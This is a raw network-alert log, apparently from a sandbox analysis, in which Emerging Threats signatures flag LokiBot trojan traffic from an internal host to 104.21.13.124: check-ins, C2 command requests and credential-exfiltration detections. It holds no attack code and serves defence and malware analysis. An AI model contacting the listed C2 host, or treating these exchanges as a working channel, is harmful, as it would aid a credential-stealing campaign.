04/03/24-06:37:31.437871	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49747	80	192.168.2.4	104.21.13.124
04/03/24-06:38:28.593679	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49819	80	192.168.2.4	104.21.13.124
04/03/24-06:38:19.372255	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49808	80	192.168.2.4	104.21.13.124
04/03/24-06:38:42.416972	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49836	80	192.168.2.4	104.21.13.124
04/03/24-06:38:43.957176	TCP	2025381	ET TROJAN LokiBot Checkin	49838	80	192.168.2.4	104.21.13.124
04/03/24-06:37:31.437871	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49747	80	192.168.2.4	104.21.13.124
04/03/24-06:38:42.416972	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49836	80	192.168.2.4	104.21.13.124
04/03/24-06:38:30.670976	TCP	2025381	ET TROJAN LokiBot Checkin	49822	80	192.168.2.4	104.21.13.124
04/03/24-06:38:15.179954	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49802	80	192.168.2.4	104.21.13.124
04/03/24-06:38:16.574818	TCP	2025381	ET TROJAN LokiBot Checkin	49804	80	192.168.2.4	104.21.13.124
04/03/24-06:38:50.437190	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49847	80	192.168.2.4	104.21.13.124
04/03/24-06:37:29.787077	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49745	80	192.168.2.4	104.21.13.124
04/03/24-06:38:02.546391	TCP	2025381	ET TROJAN LokiBot Checkin	49787	80	192.168.2.4	104.21.13.124
04/03/24-06:38:12.218805	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49798	80	192.168.2.4	104.21.13.124
04/03/24-06:38:29.278543	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49820	80	192.168.2.4	104.21.13.124
04/03/24-06:37:39.958519	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49758	80	192.168.2.4	104.21.13.124
04/03/24-06:38:20.198908	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49809	80	192.168.2.4	104.21.13.124
04/03/24-06:38:12.218805	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49798	80	192.168.2.4	104.21.13.124
04/03/24-06:38:29.278543	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49820	80	192.168.2.4	104.21.13.124
04/03/24-06:38:05.256073	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49789	80	192.168.2.4	104.21.13.124
04/03/24-06:37:50.546988	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49770	80	192.168.2.4	104.21.13.124
04/03/24-06:37:51.947017	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49773	80	192.168.2.4	104.21.13.124
04/03/24-06:38:39.111241	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49834	80	192.168.2.4	104.21.13.124
04/03/24-06:38:00.331066	TCP	2025381	ET TROJAN LokiBot Checkin	49784	80	192.168.2.4	104.21.13.124
04/03/24-06:37:25.764699	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49742	80	192.168.2.4	104.21.13.124
04/03/24-06:38:37.043826	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49831	80	192.168.2.4	104.21.13.124
04/03/24-06:37:50.546988	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49770	80	192.168.2.4	104.21.13.124
04/03/24-06:38:12.911562	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49799	80	192.168.2.4	104.21.13.124
04/03/24-06:38:39.111241	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49834	80	192.168.2.4	104.21.13.124
04/03/24-06:37:28.952090	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49744	80	192.168.2.4	104.21.13.124
04/03/24-06:37:29.787077	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49745	80	192.168.2.4	104.21.13.124
04/03/24-06:37:39.958519	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49758	80	192.168.2.4	104.21.13.124
04/03/24-06:38:01.015339	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49785	80	192.168.2.4	104.21.13.124
04/03/24-06:38:17.269664	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49805	80	192.168.2.4	104.21.13.124
04/03/24-06:38:17.269664	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49805	80	192.168.2.4	104.21.13.124
04/03/24-06:38:49.748494	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49846	80	192.168.2.4	104.21.13.124
04/03/24-06:38:01.015339	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49785	80	192.168.2.4	104.21.13.124
04/03/24-06:37:40.804238	TCP	2025381	ET TROJAN LokiBot Checkin	49759	80	192.168.2.4	104.21.13.124
04/03/24-06:38:49.748494	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49846	80	192.168.2.4	104.21.13.124
04/03/24-06:37:28.952090	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49744	80	192.168.2.4	104.21.13.124
04/03/24-06:38:01.844436	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49786	80	192.168.2.4	104.21.13.124
04/03/24-06:38:51.126318	TCP	2025381	ET TROJAN LokiBot Checkin	49848	80	192.168.2.4	104.21.13.124
04/03/24-06:38:50.437190	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49847	80	192.168.2.4	104.21.13.124
04/03/24-06:38:17.972593	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49806	80	192.168.2.4	104.21.13.124
04/03/24-06:37:45.205065	TCP	2025381	ET TROJAN LokiBot Checkin	49764	80	192.168.2.4	104.21.13.124
04/03/24-06:38:25.719182	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49815	80	192.168.2.4	104.21.13.124
04/03/24-06:37:53.598973	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49775	80	192.168.2.4	104.21.13.124
04/03/24-06:37:55.796602	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49778	80	192.168.2.4	104.21.13.124
04/03/24-06:38:23.522239	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49812	80	192.168.2.4	104.21.13.124
04/03/24-06:38:14.340654	TCP	2025381	ET TROJAN LokiBot Checkin	49801	80	192.168.2.4	104.21.13.124
04/03/24-06:37:58.122430	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49781	80	192.168.2.4	104.21.13.124
04/03/24-06:38:25.719182	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49815	80	192.168.2.4	104.21.13.124
04/03/24-06:37:58.122430	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49781	80	192.168.2.4	104.21.13.124
04/03/24-06:38:20.198908	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49809	80	192.168.2.4	104.21.13.124
04/03/24-06:38:21.763703	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49811	80	192.168.2.4	104.21.13.124
04/03/24-06:38:33.600213	TCP	2025381	ET TROJAN LokiBot Checkin	49826	80	192.168.2.4	104.21.13.124
04/03/24-06:37:52.772037	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49774	80	192.168.2.4	104.21.13.124
04/03/24-06:38:05.256073	TCP	2025381	ET TROJAN LokiBot Checkin	49789	80	192.168.2.4	104.21.13.124
04/03/24-06:37:55.796602	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49778	80	192.168.2.4	104.21.13.124
04/03/24-06:37:56.609631	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49779	80	192.168.2.4	104.21.13.124
04/03/24-06:37:36.151380	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49753	80	192.168.2.4	104.21.13.124
04/03/24-06:38:39.111241	TCP	2025381	ET TROJAN LokiBot Checkin	49834	80	192.168.2.4	104.21.13.124
04/03/24-06:38:47.687505	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49843	80	192.168.2.4	104.21.13.124
04/03/24-06:37:36.151380	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49753	80	192.168.2.4	104.21.13.124
04/03/24-06:38:07.360242	TCP	2025381	ET TROJAN LokiBot Checkin	49792	80	192.168.2.4	104.21.13.124
04/03/24-06:38:43.265047	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49837	80	192.168.2.4	104.21.13.124
04/03/24-06:37:59.640455	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49783	80	192.168.2.4	104.21.13.124
04/03/24-06:37:38.407237	TCP	2025381	ET TROJAN LokiBot Checkin	49756	80	192.168.2.4	104.21.13.124
04/03/24-06:38:47.687505	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49843	80	192.168.2.4	104.21.13.124
04/03/24-06:38:48.379699	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49844	80	192.168.2.4	104.21.13.124
04/03/24-06:38:18.685116	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49807	80	192.168.2.4	104.21.13.124
04/03/24-06:37:31.437871	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49747	80	192.168.2.4	104.21.13.124
04/03/24-06:38:11.400710	TCP	2025381	ET TROJAN LokiBot Checkin	49797	80	192.168.2.4	104.21.13.124
04/03/24-06:38:19.372255	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49808	80	192.168.2.4	104.21.13.124
04/03/24-06:37:25.764699	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49742	80	192.168.2.4	104.21.13.124
04/03/24-06:38:51.126318	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49848	80	192.168.2.4	104.21.13.124
04/03/24-06:38:15.873778	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49803	80	192.168.2.4	104.21.13.124
04/03/24-06:38:51.126318	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49848	80	192.168.2.4	104.21.13.124
04/03/24-06:38:18.685116	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49807	80	192.168.2.4	104.21.13.124
04/03/24-06:37:24.221116	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49740	80	192.168.2.4	104.21.13.124
04/03/24-06:37:36.850228	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49754	80	192.168.2.4	104.21.13.124
04/03/24-06:38:54.009985	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49852	80	192.168.2.4	104.21.13.124
04/03/24-06:37:24.221116	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49740	80	192.168.2.4	104.21.13.124
04/03/24-06:38:44.645218	TCP	2025381	ET TROJAN LokiBot Checkin	49839	80	192.168.2.4	104.21.13.124
04/03/24-06:37:39.958519	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49758	80	192.168.2.4	104.21.13.124
04/03/24-06:38:56.921190	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49856	80	192.168.2.4	104.21.13.124
04/03/24-06:38:31.366751	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49823	80	192.168.2.4	104.21.13.124
04/03/24-06:38:29.278543	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49820	80	192.168.2.4	104.21.13.124
04/03/24-06:38:31.366751	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49823	80	192.168.2.4	104.21.13.124
04/03/24-06:37:51.243601	TCP	2025381	ET TROJAN LokiBot Checkin	49772	80	192.168.2.4	104.21.13.124
04/03/24-06:37:51.947017	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49773	80	192.168.2.4	104.21.13.124
04/03/24-06:37:49.855566	TCP	2025381	ET TROJAN LokiBot Checkin	49769	80	192.168.2.4	104.21.13.124
04/03/24-06:38:56.921190	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49856	80	192.168.2.4	104.21.13.124
04/03/24-06:37:39.958519	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49758	80	192.168.2.4	104.21.13.124
04/03/24-06:37:51.947017	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49773	80	192.168.2.4	104.21.13.124
04/03/24-06:38:26.534492	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49816	80	192.168.2.4	104.21.13.124
04/03/24-06:37:37.702889	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49755	80	192.168.2.4	104.21.13.124
04/03/24-06:38:35.672062	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49829	80	192.168.2.4	104.21.13.124
04/03/24-06:38:25.036535	TCP	2025381	ET TROJAN LokiBot Checkin	49814	80	192.168.2.4	104.21.13.124
04/03/24-06:38:53.324729	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49851	80	192.168.2.4	104.21.13.124
04/03/24-06:37:25.030663	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49741	80	192.168.2.4	104.21.13.124
04/03/24-06:38:34.982502	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49828	80	192.168.2.4	104.21.13.124
04/03/24-06:38:53.324729	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49851	80	192.168.2.4	104.21.13.124
04/03/24-06:38:34.982502	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49828	80	192.168.2.4	104.21.13.124
04/03/24-06:37:29.787077	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49745	80	192.168.2.4	104.21.13.124
04/03/24-06:38:32.210551	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49824	80	192.168.2.4	104.21.13.124
04/03/24-06:37:58.810149	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49782	80	192.168.2.4	104.21.13.124
04/03/24-06:37:55.108965	TCP	2025381	ET TROJAN LokiBot Checkin	49777	80	192.168.2.4	104.21.13.124
04/03/24-06:37:33.791207	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49750	80	192.168.2.4	104.21.13.124
04/03/24-06:38:06.650555	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49791	80	192.168.2.4	104.21.13.124
04/03/24-06:38:20.890742	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49810	80	192.168.2.4	104.21.13.124
04/03/24-06:37:30.613047	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49746	80	192.168.2.4	104.21.13.124
04/03/24-06:38:17.972593	TCP	2025381	ET TROJAN LokiBot Checkin	49806	80	192.168.2.4	104.21.13.124
04/03/24-06:38:01.844436	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49786	80	192.168.2.4	104.21.13.124
04/03/24-06:38:01.844436	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49786	80	192.168.2.4	104.21.13.124
04/03/24-06:38:20.890742	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49810	80	192.168.2.4	104.21.13.124
04/03/24-06:37:29.787077	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49745	80	192.168.2.4	104.21.13.124
04/03/24-06:38:02.546391	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49787	80	192.168.2.4	104.21.13.124
04/03/24-06:38:46.856471	TCP	2025381	ET TROJAN LokiBot Checkin	49842	80	192.168.2.4	104.21.13.124
04/03/24-06:38:15.873778	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49803	80	192.168.2.4	104.21.13.124
04/03/24-06:38:31.366751	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49823	80	192.168.2.4	104.21.13.124
04/03/24-06:38:50.437190	TCP	2025381	ET TROJAN LokiBot Checkin	49847	80	192.168.2.4	104.21.13.124
04/03/24-06:38:12.911562	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49799	80	192.168.2.4	104.21.13.124
04/03/24-06:38:08.198877	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49793	80	192.168.2.4	104.21.13.124
04/03/24-06:38:05.938500	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49790	80	192.168.2.4	104.21.13.124
04/03/24-06:37:36.151380	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49753	80	192.168.2.4	104.21.13.124
04/03/24-06:38:53.324729	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49851	80	192.168.2.4	104.21.13.124
04/03/24-06:38:51.813478	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49849	80	192.168.2.4	104.21.13.124
04/03/24-06:37:43.152524	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49762	80	192.168.2.4	104.21.13.124
04/03/24-06:38:12.911562	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49799	80	192.168.2.4	104.21.13.124
04/03/24-06:38:51.126318	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49848	80	192.168.2.4	104.21.13.124
04/03/24-06:38:15.873778	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49803	80	192.168.2.4	104.21.13.124
04/03/24-06:38:02.546391	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49787	80	192.168.2.4	104.21.13.124
04/03/24-06:38:13.658001	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49800	80	192.168.2.4	104.21.13.124
04/03/24-06:37:40.804238	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49759	80	192.168.2.4	104.21.13.124
04/03/24-06:38:08.198877	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49793	80	192.168.2.4	104.21.13.124
04/03/24-06:37:46.959263	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49765	80	192.168.2.4	104.21.13.124
04/03/24-06:38:16.574818	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49804	80	192.168.2.4	104.21.13.124
04/03/24-06:38:49.748494	TCP	2025381	ET TROJAN LokiBot Checkin	49846	80	192.168.2.4	104.21.13.124
04/03/24-06:37:40.804238	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49759	80	192.168.2.4	104.21.13.124
04/03/24-06:38:03.254673	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49788	80	192.168.2.4	104.21.13.124
04/03/24-06:37:46.959263	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49765	80	192.168.2.4	104.21.13.124
04/03/24-06:38:05.938500	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49790	80	192.168.2.4	104.21.13.124
04/03/24-06:37:34.610079	TCP	2025381	ET TROJAN LokiBot Checkin	49751	80	192.168.2.4	104.21.13.124
04/03/24-06:38:01.015339	TCP	2025381	ET TROJAN LokiBot Checkin	49785	80	192.168.2.4	104.21.13.124
04/03/24-06:38:28.593679	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49819	80	192.168.2.4	104.21.13.124
04/03/24-06:38:37.732709	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49832	80	192.168.2.4	104.21.13.124
04/03/24-06:37:28.952090	TCP	2025381	ET TROJAN LokiBot Checkin	49744	80	192.168.2.4	104.21.13.124
04/03/24-06:38:37.043826	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49831	80	192.168.2.4	104.21.13.124
04/03/24-06:38:28.593679	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49819	80	192.168.2.4	104.21.13.124
04/03/24-06:38:34.282252	TCP	2025381	ET TROJAN LokiBot Checkin	49827	80	192.168.2.4	104.21.13.124
04/03/24-06:38:37.043826	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49831	80	192.168.2.4	104.21.13.124
04/03/24-06:37:55.796602	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49778	80	192.168.2.4	104.21.13.124
04/03/24-06:38:48.379699	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49844	80	192.168.2.4	104.21.13.124
04/03/24-06:37:30.613047	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49746	80	192.168.2.4	104.21.13.124
04/03/24-06:38:40.106892	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49835	80	192.168.2.4	104.21.13.124
04/03/24-06:37:28.125041	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49743	80	192.168.2.4	104.21.13.124
04/03/24-06:37:33.093731	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49749	80	192.168.2.4	104.21.13.124
04/03/24-06:38:36.358340	TCP	2025381	ET TROJAN LokiBot Checkin	49830	80	192.168.2.4	104.21.13.124
04/03/24-06:37:33.093731	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49749	80	192.168.2.4	104.21.13.124
04/03/24-06:38:37.732709	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49832	80	192.168.2.4	104.21.13.124
04/03/24-06:38:51.813478	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49849	80	192.168.2.4	104.21.13.124
04/03/24-06:37:47.778229	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49766	80	192.168.2.4	104.21.13.124
04/03/24-06:38:29.987306	TCP	2025381	ET TROJAN LokiBot Checkin	49821	80	192.168.2.4	104.21.13.124
04/03/24-06:38:09.042243	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49794	80	192.168.2.4	104.21.13.124
04/03/24-06:38:27.224947	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49817	80	192.168.2.4	104.21.13.124
04/03/24-06:37:42.314099	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49761	80	192.168.2.4	104.21.13.124
04/03/24-06:37:43.987496	TCP	2025381	ET TROJAN LokiBot Checkin	49763	80	192.168.2.4	104.21.13.124
04/03/24-06:38:52.638175	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49850	80	192.168.2.4	104.21.13.124
04/03/24-06:37:35.452745	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49752	80	192.168.2.4	104.21.13.124
04/03/24-06:38:17.269664	TCP	2025381	ET TROJAN LokiBot Checkin	49805	80	192.168.2.4	104.21.13.124
04/03/24-06:37:30.613047	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49746	80	192.168.2.4	104.21.13.124
04/03/24-06:37:35.452745	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49752	80	192.168.2.4	104.21.13.124
04/03/24-06:37:39.122189	TCP	2025381	ET TROJAN LokiBot Checkin	49757	80	192.168.2.4	104.21.13.124
04/03/24-06:38:48.379699	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49844	80	192.168.2.4	104.21.13.124
04/03/24-06:37:42.314099	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49761	80	192.168.2.4	104.21.13.124
04/03/24-06:38:52.638175	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49850	80	192.168.2.4	104.21.13.124
04/03/24-06:38:40.106892	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49835	80	192.168.2.4	104.21.13.124
04/03/24-06:38:42.416972	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49836	80	192.168.2.4	104.21.13.124
04/03/24-06:38:30.670976	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49822	80	192.168.2.4	104.21.13.124
04/03/24-06:37:32.267354	TCP	2025381	ET TROJAN LokiBot Checkin	49748	80	192.168.2.4	104.21.13.124
04/03/24-06:37:31.437871	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49747	80	192.168.2.4	104.21.13.124
04/03/24-06:37:43.152524	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49762	80	192.168.2.4	104.21.13.124
04/03/24-06:37:41.484457	TCP	2025381	ET TROJAN LokiBot Checkin	49760	80	192.168.2.4	104.21.13.124
04/03/24-06:38:15.179954	TCP	2025381	ET TROJAN LokiBot Checkin	49802	80	192.168.2.4	104.21.13.124
04/03/24-06:38:16.574818	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49804	80	192.168.2.4	104.21.13.124
04/03/24-06:37:24.221116	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49740	80	192.168.2.4	104.21.13.124
04/03/24-06:37:58.122430	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49781	80	192.168.2.4	104.21.13.124
04/03/24-06:37:53.598973	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49775	80	192.168.2.4	104.21.13.124
04/03/24-06:37:57.435447	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49780	80	192.168.2.4	104.21.13.124
04/03/24-06:37:54.423488	TCP	2025381	ET TROJAN LokiBot Checkin	49776	80	192.168.2.4	104.21.13.124
04/03/24-06:37:52.772037	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49774	80	192.168.2.4	104.21.13.124
04/03/24-06:38:49.062804	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49845	80	192.168.2.4	104.21.13.124
04/03/24-06:38:26.534492	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49816	80	192.168.2.4	104.21.13.124
04/03/24-06:38:27.904801	TCP	2025381	ET TROJAN LokiBot Checkin	49818	80	192.168.2.4	104.21.13.124
04/03/24-06:37:52.772037	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49774	80	192.168.2.4	104.21.13.124
04/03/24-06:38:30.670976	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49822	80	192.168.2.4	104.21.13.124
04/03/24-06:37:57.435447	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49780	80	192.168.2.4	104.21.13.124
04/03/24-06:38:26.534492	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49816	80	192.168.2.4	104.21.13.124
04/03/24-06:38:17.972593	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49806	80	192.168.2.4	104.21.13.124
04/03/24-06:37:49.855566	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49769	80	192.168.2.4	104.21.13.124
04/03/24-06:38:27.224947	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49817	80	192.168.2.4	104.21.13.124
04/03/24-06:38:17.972593	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49806	80	192.168.2.4	104.21.13.124
04/03/24-06:38:12.218805	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49798	80	192.168.2.4	104.21.13.124
04/03/24-06:38:32.210551	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49824	80	192.168.2.4	104.21.13.124
04/03/24-06:37:51.947017	TCP	2025381	ET TROJAN LokiBot Checkin	49773	80	192.168.2.4	104.21.13.124
04/03/24-06:38:27.904801	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49818	80	192.168.2.4	104.21.13.124
04/03/24-06:37:37.702889	TCP	2025381	ET TROJAN LokiBot Checkin	49755	80	192.168.2.4	104.21.13.124
04/03/24-06:38:29.278543	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49820	80	192.168.2.4	104.21.13.124
04/03/24-06:38:32.210551	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49824	80	192.168.2.4	104.21.13.124
04/03/24-06:38:15.179954	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49802	80	192.168.2.4	104.21.13.124
04/03/24-06:37:49.855566	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49769	80	192.168.2.4	104.21.13.124
04/03/24-06:38:02.546391	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49787	80	192.168.2.4	104.21.13.124
04/03/24-06:38:49.062804	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49845	80	192.168.2.4	104.21.13.124
04/03/24-06:38:00.331066	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49784	80	192.168.2.4	104.21.13.124
04/03/24-06:38:02.546391	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49787	80	192.168.2.4	104.21.13.124
04/03/24-06:38:12.218805	TCP	2025381	ET TROJAN LokiBot Checkin	49798	80	192.168.2.4	104.21.13.124
04/03/24-06:37:40.804238	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49759	80	192.168.2.4	104.21.13.124
04/03/24-06:37:29.787077	TCP	2025381	ET TROJAN LokiBot Checkin	49745	80	192.168.2.4	104.21.13.124
